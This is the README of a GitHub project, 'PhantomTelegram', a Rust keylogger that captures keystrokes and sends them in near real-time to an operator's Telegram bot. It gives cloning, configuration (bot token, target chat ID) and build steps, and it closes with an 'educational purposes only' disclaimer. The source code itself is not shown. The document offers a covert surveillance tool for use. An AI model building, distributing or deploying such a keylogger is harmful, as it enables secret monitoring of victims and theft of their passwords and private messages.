PhantomTelegram is a lightweight keylogger that sends captured keystrokes to a specified Telegram bot using the Telegram Bot API. It uses rdev
for key event listening and reqwest
for HTTP requests.
- Captures keystrokes and processes them.
- Sends the captured input to a Telegram chat in near real-time.
- Uses rate limiting to prevent spamming the Telegram bot API.
-
Clone the Repo:
git clone https://github.com/XeinTDM/PhantomTelegram.git cd PhantomTelegram
-
Set Your Config:
- Replace
BOT_TOKEN
with your Telegram bot token. - Replace
CHAT_ID
with your target chat ID.
- Replace
-
Build and Run:
- Install Rust if you don’t have it: Rust Installation.
- Run the program:
cargo run --release
PhantomTelegram is licensed under The Unlicense, so feel free to use, modify, and distribute it as you like.
Disclaimer: This project is intended for educational and ethical purposes only. Unauthorized use, including but not limited to illegal activities, surveillance without consent, or any action that violates laws or personal privacy, is strictly prohibited. The author assumes no responsibility for misuse.